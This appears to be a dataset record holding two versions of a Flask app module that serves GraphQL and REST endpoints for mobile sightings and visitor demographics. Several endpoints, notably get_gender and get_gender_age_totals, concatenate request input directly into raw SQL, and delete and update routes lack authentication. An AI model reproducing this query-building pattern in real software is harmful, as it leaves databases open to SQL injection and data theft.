"step-4": "import json\nfrom flask_api import FlaskAPI, status\nimport graphene\nfrom graphene import relay\nfrom graphene_sqlalchemy import SQLAlchemyConnectionField, SQLAlchemyObjectType\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import func\nfrom flask import request, jsonify, abort, make_response\nfrom flask_graphql import GraphQLView\nfrom shapely.geometry import shape, Point\nfrom instance.config import app_config\nfrom flask_bcrypt import Bcrypt\ndb = SQLAlchemy()\nfrom app.models import Date, Area, LTESighting, SmallCell, Site, SightingsPerHourPerCountry, SightingsNew, SightingsBase, WideSighting, Journey\nfrom app.models import Department as DepartmentModel\nfrom app.ng_event_models import ZoneDistrict, AttractionTotal, Profile, PurchDistrict, DOWFrequency\n\n\nclass Department(SQLAlchemyObjectType):\n\n\n class Meta:\n model = DepartmentModel\n interfaces = relay.Node,\n\n\nclass Query(graphene.ObjectType):\n node = relay.Node.Field()\n all_employees = SQLAlchemyConnectionField(Department)\n\n\ndef create_app(config_name):\n app = FlaskAPI(__name__, instance_relative_config=True)\n bcrypt = Bcrypt(app)\n schema = graphene.Schema(query=Query)\n app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql',\n schema=schema, graphiql=True))\n app.config.from_object(app_config[config_name])\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n @app.route('/api/areas/create', methods=['POST'])\n def create_areas():\n name = request.data.get('name', '')\n geodata = request.data.get('geodata', '')\n center_lat = request.data.get('center_lat')\n center_lng = request.data.get('center_lng')\n zoom = request.data.get('zoom')\n area = Area(name=name, geodata=geodata, center_lat=center_lat,\n center_lng=center_lng, zoom=zoom)\n area.save()\n response = jsonify({'id': area.id, 'name': area.name, 'geodata':\n area.geodata, 'center_lat': area.center_lat, 'center_lng': area\n .center_lng, 'zoom': area.zoom, 'date_created': area.\n date_created, 'date_modified': area.date_modified})\n return make_response(response), 201\n\n @app.route('/api/areas/delete', methods=['POST'])\n def delete_areas():\n id = request.data.get('id', 0)\n area = Area.query.filter_by(id=id).first()\n if area is not None:\n area.delete()\n return make_response(jsonify({'id': id})), 200\n\n @app.route('/api/sightingsperhour', methods=['GET'])\n def get_sightingsperhour():\n sightings = SightingsPerHourPerCountry.query.all()\n results = []\n for sighting in sightings:\n results.append({'country': sighting.country, 'hour': sighting.\n hour, 'count': sighting.count})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sightingsnew', methods=['POST'])\n def sightingsnew():\n sightings = db.session.query(SightingsBase.site_id, SightingsBase.\n country, func.count(SightingsBase.roundedtoday)).filter(\n SightingsBase.site_id.in_(request.data['selectedRow'])).filter(\n SightingsBase.roundedtoday.between(request.data['selectedDates'\n ][0], request.data['selectedDates'][1])).group_by(SightingsBase\n .site_id, SightingsBase.country).order_by(SightingsBase.site_id,\n func.count(SightingsBase.roundedtoday).desc())\n results = []\n for sighting in sightings.all():\n results.append({'country': sighting.country, 'site_id':\n sighting.site_id, 'count': sighting[2]})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/widesightingsnew', methods=['POST', 'GET'])\n def widesightingsnew():\n sightings = db.session.query(WideSighting.site_id, WideSighting.\n gender, func.count(WideSighting.gender)).filter(WideSighting.\n site_id.in_([138, 134])).group_by(WideSighting.site_id,\n WideSighting.gender)\n results = []\n for sighting in sightings.all():\n results.append({'site_id': sighting.site_id, 'gender': sighting\n .gender, 'count': sighting[2]})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/widesightings', methods=['GET'])\n def widesightings():\n sightings = WideSighting.get_all()\n results = []\n for sighting in sightings:\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sites', methods=['GET'])\n def get_sites():\n sites = Site.get_all()\n results = []\n for site in sites:\n results.append(site.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/dates', methods=['GET'])\n def get_dates():\n dates = Date.get_all()\n results = []\n for date in dates:\n results.append(date.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/areas', methods=['GET'])\n def get_areas():\n areas = Area.get_all()\n allSmallCells = SmallCell.get_all()\n results = []\n for area in areas:\n smallcellInArea = []\n for smallcell in allSmallCells:\n smallcellInArea.append(smallcell.serialise())\n obj = {'id': area.id, 'name': area.name, 'date_created': area.\n date_created, 'date_modified': area.date_modified,\n 'center_lat': area.center_lat, 'center_lng': area.\n center_lng, 'zoom': area.zoom, 'geodata': area.geodata,\n 'smallcells': smallcellInArea}\n results.append(obj)\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/smallcells', methods=['GET'])\n def get_smallcells():\n allSmallCells = SmallCell.query.order_by(SmallCell.id).all()\n results = []\n for smallcell in allSmallCells:\n results.append(smallcell.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/smallcells/update', methods=['POST'])\n def update_smallcell():\n smallcell_id = request.data.get('id', '')\n site_id = request.data.get('site_id', '')\n smallcell = SmallCell.query.filter_by(id=smallcell_id).first()\n smallcell.site_id = site_id\n smallcell.save()\n return make_response(jsonify({'smallcell_id': smallcell.id,\n 'site_id': smallcell.site_id})), 200\n\n @app.route('/api/sighting/byarea/<areaid>', methods=['GET'])\n def get_sighting(areaid):\n import string\n area = Area.query.filter_by(id=areaid).first()\n if area is None:\n return make_response(jsonify({'list': []})), 200\n sites = []\n for site in Site.get_all():\n if area.contains(site):\n sites.append(str(site.id))\n\n def generate_random_data(num_rows):\n import random\n latitude = 51.51451110408478\n longitude = -0.12620388576521444\n result = []\n for _ in range(num_rows):\n dec_lat = random.random() / 10\n dec_lon = random.random() / 10\n result.append({'lat': latitude + dec_lat, 'lng': longitude +\n dec_lon})\n return result\n results = []\n if len(sites) > 0:\n for row in db.session.execute(\n 'select * from get_gender_crossfilter(ARRAY[' + ','.join(\n sites) + '])'):\n results.append({'geos': generate_random_data(5), 'gender':\n row['__gender'], 'age_range': row['__age_range'],\n 'timestamp': row['__sighting_date'], 'count': row[\n '__count']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting/getgender/', methods=['POST'])\n def get_gender():\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n import string\n results = []\n for row in db.session.execute('select * from get_gender(ARRAY[' +\n site_ids + '],' + \"'\" + from_sighting_date + \"'\" + ',' + \"'\" +\n to_sighting_date + \"'\" + ')'):\n results.append({'site_id': row['__site_id'], 'date_month': row[\n '__date_month'], 'gender': row['__gender'], 'age_range':\n row['__age_range'], 'perc_visits': row['__perc_visits'],\n 'scaled_visits': row['__scaled_visits']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting/getgendertotals/', methods=['POST'])\n def get_gender_age_totals():\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n import string\n results = []\n for row in db.session.execute(\n 'select * from get_gender_age_totals(ARRAY[' + site_ids + '],' +\n \"'\" + from_sighting_date + \"'\" + ',' + \"'\" + to_sighting_date +\n \"'\" + ')'):\n results.append({'site_id': row['__site_id'], 'gender': row[\n '__gender'], 'age_range': row['__age_range'], '__visits':\n row['__visits']})\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sighting', methods=['GET'])\n def get_sightings():\n results = []\n for sighting in LTESighting.get_all():\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/sitescomparison', methods=['POST'])\n def get_sitescomparison():\n sightings = LTESighting.query.filter(LTESighting.smallcell.has(\n SmallCell.site_id.in_(request.data['selectedRow']))).filter(\n LTESighting.timestamp.between(request.data['selectedDates'][0],\n request.data['selectedDates'][1]))\n return make_response(jsonify({'list': [sighting.serialise() for\n sighting in sightings]})), 200\n\n @app.route('/api/sighting/bysite', methods=['GET'])\n def get_sightings_by_site():\n site_ids = request.args.getlist('site_id')\n results = []\n for sighting in LTESighting.query:\n if str(sighting.smallcell.site_id) in site_ids:\n results.append(sighting.serialise())\n return make_response(jsonify({'list': results})), 200\n\n @app.route('/api/origindestination/all', methods=['GET'])\n def get_all():\n journeys = Journey.query.all()\n thing = {}\n for journey in journeys:\n if journey.origin_id not in thing:\n thing[journey.origin_id] = {}\n if journey.destination_id not in thing[journey.origin_id\n ] and journey.destination_id != journey.origin_id:\n thing[journey.origin_id][journey.destination_id\n ] = journey.data['total']\n return make_response(jsonify(thing)), 200\n\n @app.route('/api/origindestination/<origin_id>', methods=['GET'])\n def get_od(origin_id):\n journeys = Journey.query.all()\n _j = []\n for journey in journeys:\n _j.append({'origin_id': journey.origin_id, 'destination_id':\n journey.destination_id, 'total': journey.data['total']})\n return make_response(jsonify({'list': _j})), 200\n\n @app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>',\n methods=['GET'])\n def purchase(home_district_name, type_visitor):\n days_sql = db.session.query(PurchDistrict.start_dow, func.count(\n PurchDistrict.start_dow)).group_by(PurchDistrict.start_dow).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).order_by(func.\n count(PurchDistrict.start_dow).desc()).all()\n gender_sql = db.session.query(PurchDistrict.gender, func.count(\n PurchDistrict.gender)).group_by(PurchDistrict.gender).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, func.count(PurchDistrict.gender)).group_by(\n PurchDistrict.gender, PurchDistrict.age).filter(PurchDistrict.\n gender.isnot(None)).filter(PurchDistrict.age.isnot(None)).filter(\n PurchDistrict.home_district_name.in_([home_district_name])).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_rent_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict\n .gender)).group_by(PurchDistrict.gender, PurchDistrict.age,\n PurchDistrict.rent).filter(PurchDistrict.gender.isnot(None)\n ).filter(PurchDistrict.age.isnot(None)).filter(PurchDistrict.\n type_visitor.in_([type_visitor])).all()\n days_total = sum(i[1] for i in days_sql)\n gender_total = sum(i[1] for i in gender_sql)\n gender_age_total = sum(i[2] for i in gender_age_sql)\n days_results = []\n for result in days_sql:\n days_results.append({'start_dow': result.start_dow, 'count':\n result[1], 'percent': float(result[1]) / float(days_total),\n 'total': days_total})\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender': result.gender, 'count': result\n [1], 'percent': float(result[1]) / float(gender_total)})\n gender_age_results = []\n for result in gender_age_sql:\n gender_age_results.append({'gender': result.gender, 'age':\n result.age, 'count': result[2], 'percent': float(result[2]) /\n float(gender_age_total)})\n return make_response(jsonify({'days': days_results, 'gender':\n gender_results, 'gender_age': gender_age_results})), 200\n\n @app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=[\n 'GET'])\n def purchase_rent(type_visitor):\n gender_sql = db.session.query(PurchDistrict.gender, func.count(\n PurchDistrict.gender)).group_by(PurchDistrict.gender).filter(\n PurchDistrict.type_visitor.in_([type_visitor])).all()\n gender_age_rent_sql = db.session.query(PurchDistrict.gender,\n PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict\n .gender)).group_by(PurchDistrict.gender, PurchDistrict.age,\n PurchDistrict.rent).filter(PurchDistrict.gender.isnot(None)\n ).filter(PurchDistrict.age.isnot(None)).filter(PurchDistrict.\n type_visitor.in_([type_visitor])).all()\n gender_total = sum(i[1] for i in gender_sql)\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender': result.gender, 'count': result\n [1], 'percent': float(result[1]) / float(gender_total)})\n gender_age_rent_results = []\n for result in gender_age_rent_sql:\n gender_age_rent_results.append({'gender': result.gender, 'age':\n result.age, 'rent': result.rent, 'count': result[3]})\n return make_response(jsonify({'gender': gender_results,\n 'gender_age_rent': gender_age_rent_results})), 200\n\n @app.route('/api/ng_event/districts', methods=['GET'])\n def districts():\n home_results = []\n for result in db.session.query(ZoneDistrict.home_district_code,\n ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)\n ).group_by(ZoneDistrict.home_district_code, ZoneDistrict.\n home_district_name).all():\n home_results.append({'district_code': result.home_district_code,\n 'district_name': result.home_district_name, 'visitors':\n result[2]})\n work_results = []\n for result in db.session.query(ZoneDistrict.work_district_code,\n ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)\n ).group_by(ZoneDistrict.work_district_code, ZoneDistrict.\n work_district_name).all():\n work_results.append({'district_code': result.work_district_code,\n 'district_name': result.work_district_name, 'visitors':\n result[2]})\n return make_response(jsonify({'work': {'list': work_results},\n 'home': {'list': home_results}})), 200\n\n @app.route('/api/ng_event/attractiontotals', methods=['GET'])\n def attractiontotals():\n results = []\n for result in db.session.query(AttractionTotal.zone_visitors,\n AttractionTotal.num_visitors).all():\n results.append({'zone_visitors': result.zone_visitors,\n 'num_visitors': result.num_visitors})\n return make_response(jsonify({'totals': {'list': results}})), 200\n\n @app.route('/api/ng_event/profiles', methods=['GET'])\n def profiles():\n results = []\n for result in db.session.query(Profile.country, Profile.nationality,\n Profile.name_province, Profile.gender, Profile.age, Profile.\n rent, Profile.type_visitor, Profile.date, Profile.day, Profile.\n period, Profile.name_tur_zone).limit(10000):\n district = ''\n if result.name_tur_zone == 'Zone 1':\n district = 'Chamartin'\n if result.name_tur_zone == 'Zone 2':\n district = 'Chamberi'\n if result.name_tur_zone == 'Zone 3':\n district = 'Salamanca'\n day = ''\n if result.day == 'Monday':\n day = 'Mon'\n if result.day == 'Tuesday':\n day = 'Tue'\n if result.day == 'Wednesday':\n day = 'Wed'\n if result.day == 'Thursday':\n day = 'Thu'\n if result.day == 'Friday':\n day = 'Fri'\n if result.day == 'Saturday':\n day = 'Sat'\n if result.day == 'Sunday':\n day = 'Sun'\n results.append({'country': result.country, 'nationality':\n result.nationality, 'name_province': district, 'gender':\n result.gender, 'age': result.age, 'rent': result.rent,\n 'type_visitor': result.type_visitor, 'date': result.date,\n 'day': day, 'period': result.period, 'zone': result.\n name_tur_zone})\n return make_response(jsonify(results)), 200\n\n @app.route('/api/ng_event/dowfreq', methods=['GET'])\n def dowfreq():\n results = []\n for result in db.session.query(DOWFrequency.type_visitor,\n DOWFrequency.start_dow, DOWFrequency.start_hour, DOWFrequency.count\n ).all():\n results.append({'type_visitor': result.type_visitor,\n 'start_dow': result.start_dow, 'start_hour': result.\n start_hour, 'count': result.count})\n return make_response(jsonify(results)), 200\n return app\n",
"step-5": "# app/__init__.py\nimport json\nfrom flask_api import FlaskAPI, status\nimport graphene\nfrom graphene import relay\nfrom graphene_sqlalchemy import SQLAlchemyConnectionField, SQLAlchemyObjectType\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import func\nfrom flask import request, jsonify, abort, make_response\n\nfrom flask_graphql import GraphQLView\n\nfrom shapely.geometry import shape, Point\n\n# local import\n\nfrom instance.config import app_config\n\n# For password hashing\nfrom flask_bcrypt import Bcrypt\n\n# initialize db\ndb = SQLAlchemy()\n\nfrom app.models import Date, Area, LTESighting, SmallCell, Site, SightingsPerHourPerCountry, SightingsNew, SightingsBase, WideSighting, Journey\nfrom app.models import Department as DepartmentModel\nfrom app.ng_event_models import ZoneDistrict, AttractionTotal, Profile, PurchDistrict, DOWFrequency\n\nclass Department(SQLAlchemyObjectType):\n\n class Meta:\n model = DepartmentModel\n interfaces = (relay.Node, )\n\nclass Query(graphene.ObjectType):\n node = relay.Node.Field()\n all_employees = SQLAlchemyConnectionField(Department)\n\ndef create_app(config_name):\n\n app = FlaskAPI(__name__, instance_relative_config=True)\n # overriding Werkzeugs built-in password hashing utilities using Bcrypt.\n bcrypt = Bcrypt(app)\n\n schema = graphene.Schema(query=Query)\n\n app.add_url_rule('/graphql', view_func=GraphQLView.as_view('graphql', schema=schema, graphiql=True))\n\n app.config.from_object(app_config[config_name])\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n @app.route('/api/areas/create', methods=['POST'])\n def create_areas():\n # get the access token\n\n name = request.data.get('name', '')\n geodata = request.data.get('geodata', '')\n center_lat = request.data.get('center_lat')\n center_lng = request.data.get('center_lng')\n zoom = request.data.get('zoom')\n\n area = Area(name=name, geodata=geodata, center_lat=center_lat, center_lng=center_lng, zoom=zoom)\n area.save()\n response = jsonify({\n 'id': area.id,\n 'name': area.name,\n 'geodata': area.geodata,\n 'center_lat' : area.center_lat,\n 'center_lng' : area.center_lng,\n 'zoom' : area.zoom,\n 'date_created': area.date_created,\n 'date_modified': area.date_modified\n })\n\n return make_response(response), 201\n\n @app.route('/api/areas/delete', methods=['POST'])\n def delete_areas():\n # get the access token\n id = request.data.get('id', 0)\n area = Area.query.filter_by(id=id).first()\n\n if (area is not None):\n area.delete()\n\n return make_response(jsonify({'id':id})), 200\n\n\n @app.route('/api/sightingsperhour', methods=['GET'])\n def get_sightingsperhour():\n # get all the areas\n sightings = SightingsPerHourPerCountry.query.all()\n results = []\n for sighting in sightings:\n results.append({'country' : sighting.country, 'hour' : sighting.hour, 'count' : sighting.count})\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/sightingsnew', methods=['POST'])\n def sightingsnew():\n\n sightings = db.session.query(SightingsBase.site_id, SightingsBase.country, func.count(SightingsBase.roundedtoday))\\\n .filter(SightingsBase.site_id.in_(request.data['selectedRow']))\\\n .filter(SightingsBase.roundedtoday.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))\\\n .group_by(SightingsBase.site_id, SightingsBase.country)\\\n .order_by(SightingsBase.site_id, func.count(SightingsBase.roundedtoday).desc())\\\n\n results = []\n for sighting in sightings.all():\n results.append({'country' : sighting.country, 'site_id' : sighting.site_id, 'count' : sighting[2]})\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n @app.route('/api/widesightingsnew', methods=['POST', 'GET'])\n def widesightingsnew():\n\n sightings = db.session.query(WideSighting.site_id, WideSighting.gender, func.count(WideSighting.gender))\\\n .filter(WideSighting.site_id.in_([138, 134]))\\\n .group_by(WideSighting.site_id, WideSighting.gender)\n\n results = []\n for sighting in sightings.all():\n #gender = sighting.gender if len(sighting.gender) else 'unknown'\n results.append({'site_id' : sighting.site_id, 'gender' : sighting.gender, 'count' : sighting[2]})\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n @app.route('/api/widesightings', methods=['GET'])\n def widesightings():\n\n sightings = WideSighting.get_all()\n\n results = []\n for sighting in sightings:\n results.append(sighting.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/sites', methods=['GET'])\n def get_sites():\n # get all the areas\n sites = Site.get_all()\n results = []\n for site in sites:\n results.append(site.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/dates', methods=['GET'])\n def get_dates():\n # get all the areas\n dates = Date.get_all()\n results = []\n for date in dates:\n results.append(date.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/areas', methods=['GET'])\n def get_areas():\n # get all the areas\n areas = Area.get_all()\n allSmallCells = SmallCell.get_all()\n\n results = []\n\n for area in areas:\n\n smallcellInArea = []\n for smallcell in allSmallCells:\n smallcellInArea.append(smallcell.serialise())\n\n obj = {\n 'id': area.id,\n 'name': area.name,\n 'date_created': area.date_created,\n 'date_modified': area.date_modified,\n 'center_lat' : area.center_lat,\n 'center_lng' : area.center_lng,\n 'zoom' : area.zoom,\n 'geodata': area.geodata,\n 'smallcells' : smallcellInArea\n }\n results.append(obj)\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/smallcells', methods=['GET'])\n def get_smallcells():\n allSmallCells = SmallCell.query.order_by(SmallCell.id).all()\n\n results = []\n for smallcell in allSmallCells:\n results.append(smallcell.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/smallcells/update', methods=['POST'])\n def update_smallcell():\n smallcell_id = request.data.get('id', '')\n site_id = request.data.get('site_id', '')\n\n smallcell = SmallCell.query.filter_by(id=smallcell_id).first()\n smallcell.site_id = site_id\n smallcell.save()\n\n return make_response(jsonify({ 'smallcell_id' : smallcell.id, 'site_id' : smallcell.site_id })), 200\n\n @app.route('/api/sighting/byarea/<areaid>', methods=['GET'])\n def get_sighting(areaid):\n import string\n area = Area.query.filter_by(id=areaid).first()\n if area is None : return make_response(jsonify({ 'list' : [] })), 200\n\n sites = []\n for site in Site.get_all():\n if area.contains(site):\n sites.append(str(site.id))\n\n def generate_random_data(num_rows):\n import random\n latitude = 51.51451110408478\n longitude = -0.12620388576521444\n result = []\n for _ in range(num_rows):\n dec_lat = random.random()/10\n dec_lon = random.random()/10\n result.append({'lat' : latitude + dec_lat, 'lng' : longitude + dec_lon})\n return result\n\n results = []\n if (len(sites) > 0):\n for row in db.session.execute('select * from get_gender_crossfilter(ARRAY[' + ','.join(sites) + '])'):\n\n results.append(({ 'geos': generate_random_data(5), 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'timestamp' : row['__sighting_date'], 'count' : row['__count'] }))\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n\n @app.route('/api/sighting/getgender/', methods=['POST'])\n def get_gender():\n\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n\n import string\n\n results = []\n\n for row in db.session.execute(\"select * from get_gender(ARRAY[\" + site_ids + \"],\" + \"'\" + from_sighting_date + \"'\" + \",\" + \"'\" + to_sighting_date + \"'\" + \")\"):\n results.append(({ 'site_id' : row['__site_id'], 'date_month' : row['__date_month'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], 'perc_visits' : row['__perc_visits'], 'scaled_visits' : row['__scaled_visits'] }))\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n @app.route('/api/sighting/getgendertotals/', methods=['POST'])\n def get_gender_age_totals():\n\n site_ids = str(request.data.get('site_ids', ''))\n from_sighting_date = request.data.get('selectedDates')[0]\n to_sighting_date = request.data.get('selectedDates')[1]\n\n import string\n\n results = []\n\n for row in db.session.execute(\"select * from get_gender_age_totals(ARRAY[\" + site_ids + \"],\" + \"'\" + from_sighting_date + \"'\" + \",\" + \"'\" + to_sighting_date + \"'\" + \")\"):\n results.append(({ 'site_id' : row['__site_id'], 'gender' : row['__gender'], 'age_range' : row['__age_range'], '__visits' : row['__visits'] }))\n\n return make_response(jsonify({ 'list' : results })), 200\n\n\n\n @app.route('/api/sighting', methods=['GET'])\n def get_sightings():\n\n results = []\n for sighting in LTESighting.get_all():\n results.append(sighting.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/sitescomparison', methods=['POST'])\n def get_sitescomparison():\n\n sightings = LTESighting.query\\\n .filter(LTESighting.smallcell.has(SmallCell.site_id.in_(request.data['selectedRow'])))\\\n .filter(LTESighting.timestamp.between(request.data['selectedDates'][0], request.data['selectedDates'][1]))\n\n return make_response(jsonify({ 'list' : [sighting.serialise() for sighting in sightings] })), 200\n\n @app.route('/api/sighting/bysite', methods=['GET'])\n def get_sightings_by_site():\n\n site_ids = (request.args.getlist('site_id'))\n\n results = []\n #should do this better with joins!\n for sighting in LTESighting.query:\n if (str(sighting.smallcell.site_id)) in site_ids : results.append(sighting.serialise())\n\n return make_response(jsonify({ 'list' : results })), 200\n\n @app.route('/api/origindestination/all', methods=['GET'])\n def get_all():\n journeys = Journey.query.all()\n thing = {}\n for journey in journeys:\n if (journey.origin_id not in thing) :\n thing[journey.origin_id] = {}\n if (journey.destination_id not in thing[journey.origin_id] and journey.destination_id != journey.origin_id) :\n thing[journey.origin_id][journey.destination_id] = journey.data['total']\n\n return make_response(jsonify(thing)), 200\n\n @app.route('/api/origindestination/<origin_id>', methods=['GET'])\n def get_od(origin_id):\n journeys = Journey.query.all()#.filter_by(origin_id=origin_id).all()\n _j = []\n for journey in journeys:\n _j.append({'origin_id' : journey.origin_id, 'destination_id' : journey.destination_id, 'total' : journey.data['total']})\n #_j.append({'origin_id' : journey.origin_id, 'data' : (journey.data)})\n\n return make_response(jsonify({ 'list' : _j })), 200\n\n @app.route('/api/ng_event/purchase/<home_district_name>/<type_visitor>', methods=['GET'])\n def purchase(home_district_name, type_visitor):\n\n days_sql = db.session.query(PurchDistrict.start_dow, func.count(PurchDistrict.start_dow))\\\n .group_by(PurchDistrict.start_dow)\\\n .filter(PurchDistrict.home_district_name.in_([home_district_name]))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor]))\\\n .order_by(func.count(PurchDistrict.start_dow).desc())\\\n .all()\n\n gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender)\\\n .filter(PurchDistrict.home_district_name.in_([home_district_name]))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n gender_age_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender, PurchDistrict.age)\\\n .filter(PurchDistrict.gender.isnot(None))\\\n .filter(PurchDistrict.age.isnot(None))\\\n .filter(PurchDistrict.home_district_name.in_([home_district_name]))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n\n gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\\\n .filter(PurchDistrict.gender.isnot(None))\\\n .filter(PurchDistrict.age.isnot(None))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n days_total = sum(i[1] for i in days_sql)\n gender_total = sum(i[1] for i in gender_sql)\n gender_age_total = sum(i[2] for i in gender_age_sql)\n\n days_results = []\n for result in days_sql:\n days_results.append({ 'start_dow' : result.start_dow, 'count' : result[1], 'percent' : float(result[1])/float(days_total), 'total' : days_total})\n\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})\n\n gender_age_results = []\n for result in gender_age_sql:\n gender_age_results.append({'gender' : result.gender, 'age' : result.age, 'count' : result[2], 'percent' : float(result[2])/float(gender_age_total)})\n\n return make_response(jsonify({'days' : days_results, 'gender' : gender_results, 'gender_age' : gender_age_results})), 200\n\n\n @app.route('/api/ng_event/purchase_affluence/<type_visitor>', methods=['GET'])\n def purchase_rent(type_visitor):\n\n gender_sql = db.session.query(PurchDistrict.gender, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender)\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n gender_age_rent_sql = db.session.query(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent, func.count(PurchDistrict.gender))\\\n .group_by(PurchDistrict.gender, PurchDistrict.age, PurchDistrict.rent)\\\n .filter(PurchDistrict.gender.isnot(None))\\\n .filter(PurchDistrict.age.isnot(None))\\\n .filter(PurchDistrict.type_visitor.in_([type_visitor])).all()\n\n gender_total = sum(i[1] for i in gender_sql)\n\n gender_results = []\n for result in gender_sql:\n gender_results.append({'gender' : result.gender, 'count' : result[1], 'percent' : float(result[1])/float(gender_total)})\n\n gender_age_rent_results = []\n for result in gender_age_rent_sql:\n gender_age_rent_results.append({'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'count' : result[3]})\n\n return make_response(jsonify({'gender' : gender_results, 'gender_age_rent' : gender_age_rent_results})), 200\n\n\n @app.route('/api/ng_event/districts', methods=['GET'])\n def districts():\n\n home_results = []\n for result in db.session.query(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.home_district_code, ZoneDistrict.home_district_name).all():\n home_results.append({'district_code' : result.home_district_code, 'district_name' : result.home_district_name, 'visitors' : result[2]})\n\n work_results = []\n for result in db.session.query(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name, func.sum(ZoneDistrict.visitors)).group_by(ZoneDistrict.work_district_code, ZoneDistrict.work_district_name).all():\n work_results.append({'district_code' : result.work_district_code, 'district_name' : result.work_district_name, 'visitors' : result[2]})\n\n return make_response(jsonify({'work' : { 'list' : work_results }, 'home' : { 'list' : home_results }})), 200\n\n\n @app.route('/api/ng_event/attractiontotals', methods=['GET'])\n def attractiontotals():\n\n results = []\n for result in db.session.query(AttractionTotal.zone_visitors, AttractionTotal.num_visitors).all():\n results.append({'zone_visitors' : result.zone_visitors, 'num_visitors' : result.num_visitors})\n\n return make_response(jsonify({'totals' : { 'list' : results }})), 200\n\n\n @app.route('/api/ng_event/profiles', methods=['GET'])\n def profiles():\n\n results = []\n for result in db.session.query(Profile.country, Profile.nationality, Profile.name_province, Profile.gender, Profile.age, Profile.rent, Profile.type_visitor, Profile.date, Profile.day, Profile.period, Profile.name_tur_zone).limit(10000):\n district = ''\n if result.name_tur_zone == 'Zone 1' : district = 'Chamartin'\n if result.name_tur_zone == 'Zone 2' : district = 'Chamberi'\n if result.name_tur_zone == 'Zone 3' : district = 'Salamanca'\n\n day = ''\n if result.day == 'Monday' : day = 'Mon'\n if result.day == 'Tuesday' : day = 'Tue'\n if result.day == 'Wednesday' : day = 'Wed'\n if result.day == 'Thursday' : day = 'Thu'\n if result.day == 'Friday' : day = 'Fri'\n if result.day == 'Saturday' : day = 'Sat'\n if result.day == 'Sunday' : day = 'Sun'\n\n results.append({'country' : result.country, 'nationality' : result.nationality, 'name_province' : district, 'gender' : result.gender, 'age' : result.age, 'rent' : result.rent, 'type_visitor' : result.type_visitor, 'date' : result.date, 'day' : day, 'period' : result.period, 'zone' : result.name_tur_zone })\n\n return 